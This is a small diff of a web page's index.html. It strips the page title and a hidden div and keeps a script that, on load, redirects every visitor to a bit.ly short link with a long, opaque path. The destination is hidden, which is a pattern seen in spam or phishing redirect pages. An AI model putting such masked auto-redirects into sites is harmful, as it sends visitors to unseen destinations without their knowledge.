--- a/index.html
+++ b/index.html
@@ -1,6 +1,6 @@
 
-<html> <head> <title>gedang goreng tv</title> </head>
+<html> 
 <script>
   location.replace("https://bit.ly/jihefefe788efueie6768dwdjkdwjkqvbeouihefefe788efueie6768dwdjkdwjkqvbeouuyuyveuevwhhiudyuiiueuieui9828329983uewiufewivbfsdbudsvcudvcusdvcudscvdsuvcudvcucdusyuedvieydvi2389328329832hdbbjdbjsxkbwjxwkjbwkxjw");
 </script>
-<div style="display:none;"> </html>
+</html>
